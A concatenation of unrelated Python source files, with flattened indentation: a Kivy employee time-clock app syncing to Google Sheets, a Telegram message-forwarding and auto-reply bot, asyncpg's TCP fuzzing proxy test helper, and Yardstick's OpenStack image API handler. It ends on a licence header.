timeInString = datetime.datetime.strptime(store.get(e)['timeIn'], "%Y-%m-%d %X")
else:
timeInString = ""
if store.get(e)['timeOut'] != "":
timeOutString = datetime.datetime.strptime(store.get(e)['timeOut'], "%Y-%m-%d %X")
else:
timeOutString = ""
# Generate entry
entry = {
'employeeNo': e,
'name': store.get(e)['name'],
'surname': store.get(e)['surname'],
'signedIn': store.get(e)['signedIn'],
'timeIn': timeInString,
'timeOut': timeOutString,
}
employees.append(entry)
# Sort employee and set data
self.data = sorted(employees, key=itemgetter('surname'))
# Log employee In
def log_employee_in(self, employee):
self.data[employee]['signedIn'] = True
self.data[employee]['timeIn'] = datetime.datetime.now()
self.data[employee]['timeOut'] = {}
self.refresh_from_data()
# Save data
# Connect to store
store = JsonStore('employees.json')
record = str(self.data[employee]['employeeNo'])
timeIn = self.data[employee]['timeIn'].strftime("%Y-%m-%d %X")
timeOut = ""
signedIn = True
if store.exists(record):
# store[record]['timeIn'] = str(self.data[employee]['timeIn'])
store[record]['timeIn'] = timeIn
store[record]['timeOut'] = timeOut
store[record]['signedIn'] = signedIn
store[record] = store[record]
else:
print "Unable to connect to local storage"
# Create a dirty flag
dirtyFlag = {
'index': employee,
'employeeNo': record,
'signedIn' : signedIn,
'timeIn' : timeIn,
'timeOut' : timeOut
}
# Mark the record as dirty so that it is uploaded to the Google servers.
# Do not add if already waiting for upload.
if dirtyFlag not in self.dirtyRecords:
self.dirtyRecords.append(dirtyFlag)
print str(len(self.dirtyRecords))
# Log employee Out
def log_employee_out(self, employee):
self.data[employee]['signedIn'] = False
self.data[employee]['timeOut'] = datetime.datetime.now()
#pp.pprint(self.data)
self.refresh_from_data()
# Connect to jsonstore
store = JsonStore('employees.json')
        # Check if the record exists
record = str(self.data[employee]['employeeNo'])
timeIn = self.data[employee]['timeIn'].strftime("%Y-%m-%d %X")
timeOut = self.data[employee]['timeOut'].strftime("%Y-%m-%d %X")
signedIn = False
if store.exists(record):
store[record]['timeOut'] = self.data[employee]['timeOut'].strftime("%Y-%m-%d %X")
store[record]['signedIn'] = False
store[record] = store[record]
else:
print "Unable to connect to local storage"
# Create a dirty flag
dirtyFlag = {
'index': employee,
'employeeNo': record,
'signedIn' : signedIn,
'timeIn' : timeIn,
'timeOut' : timeOut
}
# Mark the record as dirty so that it is uploaded to the Google servers.
# Do not add if already waiting for upload.
if dirtyFlag not in self.dirtyRecords:
self.dirtyRecords.append(dirtyFlag)
print self.dirtyRecords
print str(len(self.dirtyRecords))
# GOOGLE SHEET FUNCTIONS
# ----------------------
# Connect to google sheet
def get_google_sheet(self, worksheetName):
scope = ['https://spreadsheets.google.com/feeds','https://www.googleapis.com/auth/drive']
creds = ServiceAccountCredentials.from_json_keyfile_name(config.GOOGLE_CONFIG['clientSecretFile'], scope)
client = gspread.authorize(creds)
sheet = client.open(config.GOOGLE_CONFIG['fileName']).worksheet(worksheetName)
return sheet
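    # The keys read from config.GOOGLE_CONFIG in this class imply a configuration
    # shaped roughly like the sketch below (key names come from this file; the
    # values are illustrative and deployment-specific):
    #
    #     GOOGLE_CONFIG = {
    #         'clientSecretFile': 'client_secret.json',  # service-account key file
    #         'fileName': 'Employee Data',               # spreadsheet name
    #         'employeeSheet': 'Employees',              # worksheet with the roster
    #         'hoursSheet': 'Hours',                     # worksheet for completed shifts
    #     }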
# Update employee list
def update_employee_list(self):
# Check to see if there are any records that need updating
if len(self.dirtyRecords) > 0 and not self.threadRunning:
self.threadRunning = True
print "Thread running"
# Get first record from the list
employee = self.dirtyRecords.pop(0)
# Get record data for the employee
employeeNo = employee['employeeNo']
state = employee['signedIn']
timeIn = employee['timeIn']
timeOut = employee['timeOut']
print "Updating Data for Employee: {}, Time In: {}, Time Out: {}.".format(employeeNo, timeIn, timeOut)
try:
sheet = self.get_google_sheet(config.GOOGLE_CONFIG['employeeSheet'])
e = sheet.find(str(employeeNo))
pp.pprint(employeeNo)
# Update SignedIn state
print str(state)
sheet.update_acell(col['signedIn'] + str(e.row), bool2str(state))
# Update timeIn state
print timeIn
sheet.update_acell(col['timeIn'] + str(e.row), str(timeIn))
# Update timeOut state
print timeOut
sheet.update_acell(col['timeOut'] + str(e.row), str(timeOut))
except:
print "Unable to connect with Google Employee Sheet"
# Check if the record is a complete record with signIn and signOut
if timeOut:
# Add the record to the Google Sheet
try:
print "Trying to upload"
hoursSheet = self.get_google_sheet(config.GOOGLE_CONFIG['hoursSheet'])
hoursSheet.append_row([str(employeeNo), str(timeIn), str(timeOut)])
except:
"Unable to connect with Google Hours Sheet"
if employee not in self.dirtyRecords:
self.dirtyRecords.append(employee)
else:
print "Upload successful."
self.threadRunning = False
print "Thread Ending"
# Employee View
class EmployeeView(RecycleDataViewBehavior, BoxLayout):
index = None
employeeNo = ObjectProperty()
name = StringProperty()
surname = StringProperty()
active = BooleanProperty()
signedIn = BooleanProperty()
timeIn = ObjectProperty()
    timeOut = ObjectProperty()
normalHours = ObjectProperty()
time_in_string = StringProperty()
time_out_string = StringProperty()
clean = BooleanProperty()
pressed = BooleanProperty()
def __init__(self, **kwargs):
super(EmployeeView, self).__init__(**kwargs)
self.pressed = False
# Functions for calculating the string version of the time variables
self.bind(timeIn=self.get_time_in_string)
self.bind(timeOut=self.get_time_out_string)
def refresh_view_attrs(self, rv, index, data):
''' Catch and handle the view changes '''
self.index = index
self.data = data
return super(EmployeeView, self).refresh_view_attrs(
rv, index, data)
def get_time_out_string(self, instance, value):
# Function bound to the timeOut variable to automatically calculate string
#DEBUG print "Recalculated time out string"
if isinstance(self.timeOut, datetime.datetime):
self.time_out_string = self.timeOut.strftime("%H:%M")
self.data['timeOut'] = self.timeOut
else:
self.data['timeOut'] = {}
self.time_out_string = "N/A"
def get_time_in_string(self, instance, value):
# Function bound to the timeIn variable to automatically calculate string.
#DEBUG print "Recalculated time in string"
if isinstance(self.timeIn, datetime.datetime):
self.time_in_string = self.timeIn.strftime("%H:%M")
self.data['timeIn'] = self.timeIn
else:
self.data['timeIn'] = {}
self.time_in_string = "N/A"
def on_touch_down(self, touch):
if self.collide_point(*touch.pos):
self.pressed = True
def on_touch_up(self, touch):
if self.collide_point(*touch.pos):
self.pressed = False
popup = EmployeePopup(self)
popup.open()
def save_login(self, employee):
# Pass action to the EmployeeList class
self.parent.parent.log_employee_in(self.index)
def save_logout(self, employee):
# Pass action to the EmployeeList class
self.parent.parent.log_employee_out(self.index)
def getDayOfWeek(dateString):
t1 = time.strptime(dateString, "%m/%d/%Y")
t2 = time.mktime(t1)
return (time.localtime(t2)[6])
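# Hedged example of getDayOfWeek (illustrative date only): time.strptime parses
# the "%m/%d/%Y" string and tm_wday is 0 for Monday, so
#   getDayOfWeek("01/06/2020")  # -> 0, since 6 January 2020 was a Monday
# The result is then used as an index into the Weekday lookup defined elsewhere.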
class ClockWidget(BoxLayout):
uxTime = StringProperty('')
uxSeconds = StringProperty('')
uxDate = StringProperty('')
uxDay = StringProperty('')
def update(self, dt):
self.uxTime = time.strftime("%H:%M", time.localtime())
self.uxSeconds = time.strftime("%S", time.localtime())
self.uxDate = time.strftime("%d %B %Y", time.localtime())
self.uxDay = Weekday[getDayOfWeek(time.strftime("%m/%d/%Y", time.localtime()))]
# Update the Employee List
employeeList = App.get_running_app().employeeList
threading.Thread(target=employeeList.update_employee_list).start()
class TimeApp(App):
employeeList = EmployeeList()
def build(self):
clockWidget = ClockWidget()
Clock.schedule_interval(clockWidget.update, 1)
return clockWidget
if __name__ == '__main__':
TimeApp().run()
|
main.py
|
# -*- coding: utf-8 -*-
import datetime
import socket
import logging
import os
import pprint # noqa
import string
import threading
import time
from pytg.utils import coroutine
from pytg.receiver import Receiver
from pytg.sender import Sender
from pytg.exceptions import ConnectionError
from storage import Storage
MESSAGES = (
'new',
'idle',
)
TB_TG_HOST = os.environ.get('TB_TG_HOST', 'localhost') # telegram cli host
TB_TG_PORT = int(os.environ.get('TB_TG_PORT', 4458)) # telegram cli port
TB_LOGLEVEL = getattr(logging, os.environ.get('TB_LOGLEVEL', '').upper(), 'INFO')
TB_INTERVAL_RESPONSE_IDLE_DIALOG = int(os.environ.get('TB_INTERVAL_RESPONSE_IDLE_DIALOG', 3 * 60))
TB_UPDATE_DIALOG_LIST_INTERVAL = int(os.environ.get('TB_UPDATE_DIALOG_LIST_INTERVAL', 5))
TB_UPDATE_CONTACTS_LIST_INTERVAL = int(os.environ.get('TB_UPDATE_CONTACTS_LIST_INTERVAL', 9))
_TB_FORWARD_USERS = filter(bool, map(string.strip, os.environ.get('TB_FORWARD_USERS', '').split(','))) # the target users for forwarding messages
_TB_FORWARD_USERS = map(lambda x: x.decode('utf-8'), _TB_FORWARD_USERS)
TB_MESSAGES_DIRECTORY = os.environ.get('TB_MESSAGES_DIRECTORY', None)
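# Example invocation (illustrative values only; the concrete host, users and
# directory below are assumptions, not requirements of this module):
#   TB_TG_HOST=localhost TB_TG_PORT=4458 \
#   TB_FORWARD_USERS=alice,bob \
#   TB_MESSAGES_DIRECTORY=/srv/telegram-bot/messages \
#   TB_LOGLEVEL=debug python main.py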
log_format = logging.Formatter('[%(levelname)5s] %(asctime)s: %(msg)s (%(module)s.%(funcName)s:%(lineno)d)')
log = logging.getLogger(__name__)
log.setLevel(TB_LOGLEVEL)
st = logging.StreamHandler()
st.setFormatter(log_format)
log.addHandler(st)
STORAGE = Storage(os.path.join(os.environ.get('HOME'), '.telegram-cli'))
RECEIVER = SENDER = None
DATA = dict()
if STORAGE.get('f', None) is None:
STORAGE.set('f', dict())
if STORAGE.get('d', None) is None:
STORAGE.set('d', dict())
def connect():
global RECEIVER, SENDER
log.debug('> trying to connect: %s:%s' % (TB_TG_HOST, TB_TG_PORT))
RECEIVER = Receiver(host=TB_TG_HOST, port=TB_TG_PORT)
SENDER = Sender(host=TB_TG_HOST, port=TB_TG_PORT)
RECEIVER.start()
log.debug('< connected')
return
def with_connection(f):
def w(*a, **kw):
while True:
try:
return f(*a, **kw)
except (socket.gaierror, ConnectionError):
time.sleep(1)
connect()
return w
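# with_connection is a retry wrapper: any socket.gaierror or ConnectionError
# raised by the wrapped callable triggers a short sleep, a reconnect and a
# retry. A minimal sketch of applying it directly (assumes SENDER is already
# connected; not how it is used below, just an illustration):
#
#   safe_dialog_list = with_connection(SENDER.dialog_list)
#   dialogs = safe_dialog_list()  # keeps retrying until telegram-cli answers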
def is_forward_user(o):
if o.get('username') in _TB_FORWARD_USERS:
return True
if o.get('print_name') in _TB_FORWARD_USERS:
return True
if o.get('id') in _TB_FORWARD_USERS:
return True
if o.get('phone') in _TB_FORWARD_USERS:
return True
return False
def _update_contact_list():
log.debug('> trying to update contacts list')
if 'contacts' not in DATA:
DATA['contacts'] = list()
try:
l = SENDER.contacts_list()
except TypeError:
return
DATA['contacts'] = l
found_forward_user = filter(is_forward_user, DATA['contacts'])
tb_forward_users = STORAGE.get('f', dict())
for k, v in tb_forward_users.items():
if v.get('_type') not in ('contact',):
continue
        if not any(k == x.get('id') for x in found_forward_user):
            del tb_forward_users[k]
for i in found_forward_user:
if i.get('id') not in tb_forward_users:
i['_type'] = 'contact'
tb_forward_users[i.get('id')] = i
log.debug('< updated contacts list')
STORAGE.set('f', tb_forward_users)
log.debug('< forwarded users: %s' % STORAGE.get('f'))
return
def update_contact_list():
log.debug('> trying to update contacts list')
while True:
try:
_update_contact_list()
except TypeError:
pass
time.sleep(TB_UPDATE_CONTACTS_LIST_INTERVAL)
return
def _update_dialog_list():
log.debug('> trying to update dialog list')
dialogs = dict()
found = list()
found_forward_user = list()
for i in SENDER.dialog_list():
if is_forward_user(i):
found_forward_user.append(i)
if i.get('type') not in ('user',):
continue
p = i.get('phone')
found.append(p)
if p not in dialogs:
dialogs[p] = i
tb_forward_users = STORAGE.get('f', dict())
for k, v in tb_forward_users.items():
if v.get('_type') not in ('dialog',):
continue
        if not any(k == x.get('id') for x in found_forward_user):
            del tb_forward_users[k]
for i in found_forward_user:
if i.get('id') not in tb_forward_users:
i['_type'] = 'dialog'
tb_forward_users[i.get('id')] = i
log.debug('< updated dialog list')
STORAGE.set('f', tb_forward_users)
log.debug('< forwarded users: %s' % STORAGE.get('f'))
return
def update_dialog_list():
while True:
try:
_update_dialog_list()
except TypeError:
pass
time.sleep(TB_UPDATE_DIALOG_LIST_INTERVAL)
return
def forward(msg):
for i in STORAGE.get('f', dict()).values():
SENDER.fwd(i.get('print_name'), msg.get('id'))
return
def _watch_dialogs():
found = dict()
for k, v in STORAGE.get('d').items():
updated = v.get('_updated')
if updated is None:
continue
        deadline = updated + TB_INTERVAL_RESPONSE_IDLE_DIALOG
        if time.time() < deadline:
continue
found[k] = v
if not found:
return
# load message
messages = dict()
for i in MESSAGES:
message_file = os.path.join(TB_MESSAGES_DIRECTORY, '%s.txt' % i)
if not os.path.isfile(message_file):
continue
messages[i] = file(message_file).read().strip()
# send message
for k, v in found.items():
# set message type
if v['_updated'] == v.get('_created'):
message_type = 'new'
else:
message_type = 'idle'
message = messages.get(message_type)
if not message:
continue
SENDER.send_msg(v.get('cmd'), message.decode('utf-8'))
d = STORAGE.get('d')
d[k]['_updated'] = None
STORAGE.set('d', d)
return
def watch_dialogs():
while True:
time.sleep(2)
_watch_dialogs()
return
@coroutine
def handle_messages(*a, **kw):
try:
while True:
msg = yield
if msg.event in ('online-status',):
continue
when = None
if hasattr(msg, 'date'):
when = datetime.datetime.fromtimestamp(msg.date)
elif hasattr(msg, 'when'):
when = datetime.datetime.strptime(msg.when, '%Y-%m-%d %H:%M:%S')
if msg.event not in ('message',):
continue
if hasattr(msg, 'peer') and msg.peer is None: # owner message
continue
if hasattr(msg, 'sender') and msg.sender is not None and msg.sender.get('username') == DATA['me'].get('username'): # me
continue
log.debug('got message: %s [%s]: %s' % (when, msg.event, msg))
SENDER.mark_read(msg.peer.cmd)
SENDER.mark_read(msg.receiver.cmd)
now = time.time()
o = msg.sender.copy()
if msg.sender.cmd not in STORAGE.get('d'):
o['_created'] = now
o['_updated'] = now
d = STORAGE.get('d')
d[msg.sender.cmd] = o
STORAGE.set('d', d)
forward(msg)
except GeneratorExit:
pass
except KeyboardInterrupt:
RECEIVER.stop()
log.info("exiting")
def run():
with_connection(connect)()
DATA['me'] = SENDER.get_self()
contacts_list_thread = threading.Thread(name="contacts", target=with_connection(update_contact_list), args=())
contacts_list_thread.daemon = True
contacts_list_thread.start()
dialog_list_thread = threading.Thread(name="dialogs", target=with_connection(update_dialog_list), args=())
dialog_list_thread.daemon = True
dialog_list_thread.start()
watch_dialogs_thread = threading.Thread(name="watch dialog", target=with_connection(watch_dialogs), args=())
watch_dialogs_thread.daemon = True
watch_dialogs_thread.start()
RECEIVER.start() # start the Connector.
RECEIVER.message(with_connection(handle_messages)(RECEIVER))
|
fuzzer.py
|
# Copyright (C) 2016-present the asyncpg authors and contributors
# <see AUTHORS file>
#
# This module is part of asyncpg and is released under
# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0
import asyncio
import socket
import threading
import typing
from asyncpg import cluster
class StopServer(Exception):
pass
class TCPFuzzingProxy:
def __init__(self, *, listening_addr: str='127.0.0.1',
listening_port: typing.Optional[int]=None,
backend_host: str, backend_port: int,
settings: typing.Optional[dict]=None) -> None:
self.listening_addr = listening_addr
self.listening_port = listening_port
self.backend_host = backend_host
self.backend_port = backend_port
self.settings = settings or {}
self.loop = None
self.connectivity = None
self.connectivity_loss = None
self.stop_event = None
self.connections = {}
self.sock = None
self.listen_task = None
async def _wait(self, work):
work_task = asyncio.ensure_future(work)
stop_event_task = asyncio.ensure_future(self.stop_event.wait())
try:
await asyncio.wait(
[work_task, stop_event_task],
return_when=asyncio.FIRST_COMPLETED)
if self.stop_event.is_set():
raise StopServer()
else:
return work_task.result()
finally:
if not work_task.done():
work_task.cancel()
if not stop_event_task.done():
stop_event_task.cancel()
def start(self):
started = threading.Event()
self.thread = threading.Thread(
target=self._start_thread, args=(started,))
self.thread.start()
if not started.wait(timeout=2):
raise RuntimeError('fuzzer proxy failed to start')
def stop(self):
self.loop.call_soon_threadsafe(self._stop)
self.thread.join()
def _stop(self):
self.stop_event.set()
def _start_thread(self, started_event):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.connectivity = asyncio.Event()
self.connectivity.set()
self.connectivity_loss = asyncio.Event()
self.stop_event = asyncio.Event()
if self.listening_port is None:
self.listening_port = cluster.find_available_port()
self.sock = socket.socket()
self.sock.bind((self.listening_addr, self.listening_port))
self.sock.listen(50)
self.sock.setblocking(False)
try:
self.loop.run_until_complete(self._main(started_event))
finally:
self.loop.close()
async def _main(self, started_event):
self.listen_task = asyncio.ensure_future(self.listen())
# Notify the main thread that we are ready to go.
started_event.set()
try:
await self.listen_task
finally:
for c in list(self.connections):
c.close()
await asyncio.sleep(0.01)
if hasattr(self.loop, 'remove_reader'):
self.loop.remove_reader(self.sock.fileno())
self.sock.close()
async def listen(self):
while True:
try:
client_sock, _ = await self._wait(
self.loop.sock_accept(self.sock))
backend_sock = socket.socket()
backend_sock.setblocking(False)
await self._wait(self.loop.sock_connect(
backend_sock, (self.backend_host, self.backend_port)))
except StopServer:
break
conn = Connection(client_sock, backend_sock, self)
conn_task = self.loop.create_task(conn.handle())
self.connections[conn] = conn_task
def trigger_connectivity_loss(self):
self.loop.call_soon_threadsafe(self._trigger_connectivity_loss)
def _trigger_connectivity_loss(self):
self.connectivity.clear()
self.connectivity_loss.set()
def restore_connectivity(self):
self.loop.call_soon_threadsafe(self._restore_connectivity)
def _restore_connectivity(self):
self.connectivity.set()
self.connectivity_loss.clear()
def reset(self):
self.restore_connectivity()
def _close_connection(self, connection):
conn_task = self.connections.pop(connection, None)
if conn_task is not None:
conn_task.cancel()
def close_all_connections(self):
for conn in list(self.connections):
self.loop.call_soon_threadsafe(self._close_connection, conn)
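# A minimal usage sketch of TCPFuzzingProxy (the backend host/port values are
# assumptions; a real test would point them at a running PostgreSQL server):
#
#   proxy = TCPFuzzingProxy(backend_host='127.0.0.1', backend_port=5432)
#   proxy.start()                          # spins up the proxy event-loop thread
#   try:
#       # connect a client to ('127.0.0.1', proxy.listening_port) ...
#       proxy.trigger_connectivity_loss()  # reads/writes are held back
#       proxy.restore_connectivity()       # buffered data flows again
#   finally:
#       proxy.stop()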
class Connection:
def __init__(self, client_sock, backend_sock, proxy):
self.client_sock = client_sock
self.backend_sock = backend_sock
self.proxy = proxy
self.loop = proxy.loop
self.connectivity = proxy.connectivity
self.connectivity_loss = proxy.connectivity_loss
self.proxy_to_backend_task = None
self.proxy_from_backend_task = None
self.is_closed = False
def close(self):
if self.is_closed:
return
self.is_closed = True
if self.proxy_to_backend_task is not None:
self.proxy_to_backend_task.cancel()
self.proxy_to_backend_task = None
if self.proxy_from_backend_task is not None:
self.proxy_from_backend_task.cancel()
self.proxy_from_backend_task = None
self.proxy._close_connection(self)
async def handle(self):
self.proxy_to_backend_task = asyncio.ensure_future(
self.proxy_to_backend())
self.proxy_from_backend_task = asyncio.ensure_future(
self.proxy_from_backend())
try:
await asyncio.wait(
[self.proxy_to_backend_task, self.proxy_from_backend_task],
return_when=asyncio.FIRST_COMPLETED)
finally:
if self.proxy_to_backend_task is not None:
self.proxy_to_backend_task.cancel()
if self.proxy_from_backend_task is not None:
self.proxy_from_backend_task.cancel()
# Asyncio fails to properly remove the readers and writers
# when the task doing recv() or send() is cancelled, so
# we must remove the readers and writers manually before
# closing the sockets.
self.loop.remove_reader(self.client_sock.fileno())
self.loop.remove_writer(self.client_sock.fileno())
self.loop.remove_reader(self.backend_sock.fileno())
self.loop.remove_writer(self.backend_sock.fileno())
self.client_sock.close()
self.backend_sock.close()
async def _read(self, sock, n):
read_task = asyncio.ensure_future(
self.loop.sock_recv(sock, n))
conn_event_task = asyncio.ensure_future(
self.connectivity_loss.wait())
try:
await asyncio.wait(
[read_task, conn_event_task],
return_when=asyncio.FIRST_COMPLETED)
if self.connectivity_loss.is_set():
return None
else:
return read_task.result()
finally:
if not self.loop.is_closed():
if not read_task.done():
read_task.cancel()
if not conn_event_task.done():
conn_event_task.cancel()
async def _write(self, sock, data):
write_task = asyncio.ensure_future(
self.loop.sock_sendall(sock, data))
conn_event_task = asyncio.ensure_future(
self.connectivity_loss.wait())
try:
await asyncio.wait(
[write_task, conn_event_task],
return_when=asyncio.FIRST_COMPLETED)
if self.connectivity_loss.is_set():
return None
else:
return write_task.result()
finally:
if not self.loop.is_closed():
if not write_task.done():
write_task.cancel()
if not conn_event_task.done():
conn_event_task.cancel()
async def proxy_to_backend(self):
buf = None
try:
while True:
await self.connectivity.wait()
if buf is not None:
data = buf
buf = None
else:
data = await self._read(self.client_sock, 4096)
if data == b'':
break
if self.connectivity_loss.is_set():
if data:
buf = data
continue
await self._write(self.backend_sock, data)
except ConnectionError:
pass
finally:
if not self.loop.is_closed():
self.loop.call_soon(self.close)
async def proxy_from_backend(self):
buf = None
try:
while True:
await self.connectivity.wait()
if buf is not None:
data = buf
buf = None
else:
data = await self._read(self.backend_sock, 4096)
if data == b'':
break
if self.connectivity_loss.is_set():
if data:
buf = data
continue
await self._write(self.client_sock, data)
except ConnectionError:
pass
finally:
if not self.loop.is_closed():
self.loop.call_soon(self.close)
|
images.py
|
##############################################################################
# Copyright (c) 2017 Huawei Technologies Co.,Ltd.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
import logging
import os
import uuid
import threading
import requests
import datetime
from api import ApiResource
from api.database.v2.handlers import V2ImageHandler
from api.database.v2.handlers import V2EnvironmentHandler
from yardstick.common.utils import result_handler
from yardstick.common.utils import source_env
from yardstick.common.utils import change_obj_to_dict
from yardstick.common.openstack_utils import get_nova_client
from yardstick.common.openstack_utils import get_glance_client
from yardstick.common import constants as consts
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.DEBUG)
IMAGE_MAP = {
'yardstick-image': {
'path': os.path.join(consts.IMAGE_DIR, 'yardstick-image.img'),
'url': 'http://artifacts.opnfv.org/yardstick/images/yardstick-image.img'
},
'Ubuntu-16.04': {
'path': os.path.join(consts.IMAGE_DIR, 'xenial-server-cloudimg-amd64-disk1.img'),
'url': 'cloud-images.ubuntu.com/xenial/current/xenial-server-cloudimg-amd64-disk1.img'
},
'cirros-0.3.5': {
'path': os.path.join(consts.IMAGE_DIR, 'cirros-0.3.5-x86_64-disk.img'),
'url': 'http://download.cirros-cloud.net/0.3.5/cirros-0.3.5-x86_64-disk.img'
}
}
class V2Images(ApiResource):
def get(self):
try:
source_env(consts.OPENRC)
except Exception:
return result_handler(consts.API_ERROR, 'source openrc error')
nova_client = get_nova_client()
try:
images_list = nova_client.images.list()
except Exception:
return result_handler(consts.API_ERROR, 'get images error')
else:
images = {i.name: self.get_info(change_obj_to_dict(i)) for i in images_list}
return result_handler(consts.API_SUCCESS, {'status': 1, 'images': images})
def post(self):
return self._dispatch_post()
def get_info(self, data):
try:
size = data['OS-EXT-IMG-SIZE:size']
except KeyError:
size = None
else:
size = float(size) / 1024 / 1024
result = {
'name': data.get('name', ''),
            'description': data.get('description', ''),
'size': size,
'status': data.get('status'),
'time': data.get('updated')
}
return result
def load_image(self, args):
try:
image_name = args['name']
except KeyError:
            return result_handler(consts.API_ERROR, 'image name must be provided')
if image_name not in IMAGE_MAP:
return result_handler(consts.API_ERROR, 'wrong image name')
thread = threading.Thread(target=self._do_load_image, args=(image_name,))
thread.start()
return result_handler(consts.API_SUCCESS, {'image': image_name})
def upload_image(self, args):
try:
image_file = args['file']
except KeyError:
return result_handler(consts.API_ERROR, 'file must be provided')
try:
environment_id = args['environment_id']
except KeyError:
return result_handler(consts.API_ERROR, 'environment_id must be provided')
try:
uuid.UUID(environment_id)
except ValueError:
return result_handler(consts.API_ERROR, 'invalid environment id')
environment_handler = V2EnvironmentHandler()
try:
environment = environment_handler.get_by_uuid(environment_id)
except ValueError:
return result_handler(consts.API_ERROR, 'no such environment')
file_path = os.path.join(consts.IMAGE_DIR, image_file.filename)
LOG.info('saving file')
image_file.save(file_path)
LOG.info('loading image')
self._load_image(image_file.filename, file_path)
LOG.info('creating image in DB')
image_handler = V2ImageHandler()
image_id = str(uuid.uuid4())
image_init_data = {
'uuid': image_id,
'name': image_file.filename,
'environment_id': environment_id
}
image_handler.insert(image_init_data)
LOG.info('update image in environment')
if environment.image_id:
image_list = environment.image_id.split(',')
image_list.append(image_id)
new_image_id = ','.join(image_list)
else:
new_image_id = image_id
environment_handler.update_attr(environment_id, {'image_id': new_image_id})
return result_handler(consts.API_SUCCESS, {'uuid': image_id})
def upload_image_by_url(self, args):
try:
url = args['url']
except KeyError:
return result_handler(consts.API_ERROR, 'url must be provided')
try:
environment_id = args['environment_id']
except KeyError:
return result_handler(consts.API_ERROR, 'environment_id must be provided')
try:
uuid.UUID(environment_id)
except ValueError:
return result_handler(consts.API_ERROR, 'invalid environment id')
environment_handler = V2EnvironmentHandler()
try:
environment = environment_handler.get_by_uuid(environment_id)
except ValueError:
return result_handler(consts.API_ERROR, 'no such environment')
thread = threading.Thread(target=self._do_upload_image_by_url, args=(url,))
thread.start()
file_name = url.split('/')[-1]
LOG.info('creating image in DB')
image_handler = V2ImageHandler()
image_id = str(uuid.uuid4())
image_init_data = {
'uuid': image_id,
'name': file_name,
'environment_id': environment_id
}
image_handler.insert(image_init_data)
LOG.info('update image in environment')
if environment.image_id:
image_list = environment.image_id.split(',')
image_list.append(image_id)
new_image_id = ','.join(image_list)
else:
new_image_id = image_id
environment_handler.update_attr(environment_id, {'image_id': new_image_id})
return result_handler(consts.API_SUCCESS, {'uuid': image_id})
def delete_image(self, args):
try:
image_name = args['name']
except KeyError:
            return result_handler(consts.API_ERROR, 'image name must be provided')
if image_name not in IMAGE_MAP:
return result_handler(consts.API_ERROR, 'wrong image name')
glance_client = get_glance_client()
try:
image = next((i for i in glance_client.images.list() if i.name == image_name))
except StopIteration:
return result_handler(consts.API_ERROR, 'can not find image')
glance_client.images.delete(image.id)
return result_handler(consts.API_SUCCESS, {})
def _do_upload_image_by_url(self, url):
file_name = url.split('/')[-1]
path = os.path.join(consts.IMAGE_DIR, file_name)
LOG.info('download image')
self._download_image(url, path)
LOG.info('loading image')
self._load_image(file_name, path)
def _do_load_image(self, image_name):
if not os.path.exists(IMAGE_MAP[image_name]['path']):
self._download_image(IMAGE_MAP[image_name]['url'],
IMAGE_MAP[image_name]['path'])
self._load_image(image_name, IMAGE_MAP[image_name]['path'])
def _load_image(self, image_name, image_path):
LOG.info('source openrc')
source_env(consts.OPENRC)
LOG.info('load image')
glance_client = get_glance_client()
image = glance_client.images.create(name=image_name,
visibility='public',
disk_format='qcow2',
container_format='bare')
with open(image_path, 'rb') as f:
glance_client.images.upload(image.id, f)
LOG.info('Done')
def _download_image(self, url, path):
start = datetime.datetime.now().replace(microsecond=0)
LOG.info('download image from: %s', url)
self._download_file(url, path)
end = datetime.datetime.now().replace(microsecond=0)
LOG.info('download image success, total: %s s', end - start)
def _download_handler(self, start, end, url, filename):
headers = {'Range': 'bytes=%d-%d' % (start, end)}
r = requests.get(url, headers=headers, stream=True)
with open(filename, "r+b") as fp:
fp.seek(start)
fp.tell()
fp.write(r.content)
def _download_file(self, url, path, num_thread=5):
r = requests.head(url)
try:
file_size = int(r.headers['content-length'])
except Exception:
return
with open(path, 'wb') as f:
f.truncate(file_size)
thread_list = []
part = file_size // num_thread
for i in range(num_thread):
start = part * i
end = start + part if i != num_thread - 1 else file_size
kwargs = {'start': start, 'end': end, 'url': url, 'filename': path}
t = threading.Thread(target=self._download_handler, kwargs=kwargs)
t.setDaemon(True)
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
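# Rough sketch of how _download_file splits a download (illustrative numbers
# only): a 100-byte file fetched with num_thread=5 produces Range headers
#   bytes=0-20, bytes=20-40, bytes=40-60, bytes=60-80, bytes=80-100
# and each worker thread seeks to its own offset in the pre-truncated file
# before writing its chunk.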
class V2Image(ApiResource):
def get(self, image_id):
try:
uuid.UUID(image_id)
except ValueError:
return result_handler(consts.API_ERROR, 'invalid image id')
image_handler = V2ImageHandler()
try:
image = image_handler.get_by_uuid(image_id)
except ValueError:
return result_handler(consts.API_ERROR, 'no such image id')
nova_client = get_nova_client()
images = nova_client.images.list()
try:
image = next((i for i in images if i.name == image.name))
except StopIteration:
pass
return_image = self.get_info(change_obj_to_dict(image))
return_image['id'] = image_id
return result_handler(consts.API_SUCCESS, {'image': return_image})
def delete(self, image_id):
try:
uuid.UUID(image_id)
except ValueError:
return result_handler(consts.API_ERROR, 'invalid image id')
image_handler = V2ImageHandler()
try:
image = image_handler.get_by_uuid(image_id)
except ValueError:
return result_handler(consts.API_ERROR, 'no such image id')
LOG.info('delete image in openstack')
glance_client = get_glance_client()
try:
image_o = next((i for i in glance_client.images.list() if i.name == image.name))
except StopIteration:
return result_handler(consts.API_ERROR, 'can not find image')
glance_client.images.delete(image_o.id)
LOG.info('delete image in environment')
environment_id = image.environment_id
environment_handler = V2EnvironmentHandler()
environment = environment_handler.get_by_uuid(environment_id)
image_list = environment.image_id.split(',')
image_list.remove(image_id)
environment_handler.update_attr(environment_id, {'image_id': ','.join(image_list)})
LOG.info('delete image in DB')
image_handler.delete_by_uuid(image_id)
return result_handler(consts.API_SUCCESS, {'image': image_id})
def get_info(self, data):
try:
size = data['OS-EXT-IMG-SIZE:size']
except KeyError:
size = None
else:
size = float(size) / 1024 / 1024
result = {
'name': data.get('name', ''),
'description': data.get('description', ''),
'size': size,
'status': data.get('status'),
'time': data.get('updated')
}
return result
|
discretization.py
|
# Copyright (c) 2011-2016 by California Institute of Technology
# Copyright (c) 2016 by The Regents of the University of Michigan
# All rights reserved.
#
